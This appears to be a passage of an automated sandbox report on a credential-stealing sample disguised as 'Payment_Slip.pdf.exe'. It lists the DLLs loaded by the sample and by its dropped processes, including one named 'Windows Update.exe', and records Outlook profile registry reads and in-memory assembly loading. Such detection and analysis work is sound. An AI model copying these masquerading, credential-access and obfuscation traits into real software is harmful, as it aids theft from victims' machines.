Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File opened: C:\Users\user\Desktop\Payment_Slip.pdf.cfg
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Roaming\host.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Payment_Slip.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Payment_Slip.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs .Net Code: mxE3KDYg98 System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 11_2_0041A8DA
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004000D8 push es; iretd 11_2_004000D9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040008C push es; iretd 11_2_0040008D
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004542E6 push ecx; ret 11_2_004542F9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0045B4FD push esi; ret 11_2_0045B506
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00432BD6 push ecx; ret 11_2_00432BE9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00454C08 push eax; ret 11_2_00454C26
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D3DF0 push esi; retn 0006h 12_2_007D3F6A
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D40F9 push edi; retn 0006h 12_2_007D40FA
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_007D5168 pushad ; retn 0006h 12_2_007D516A
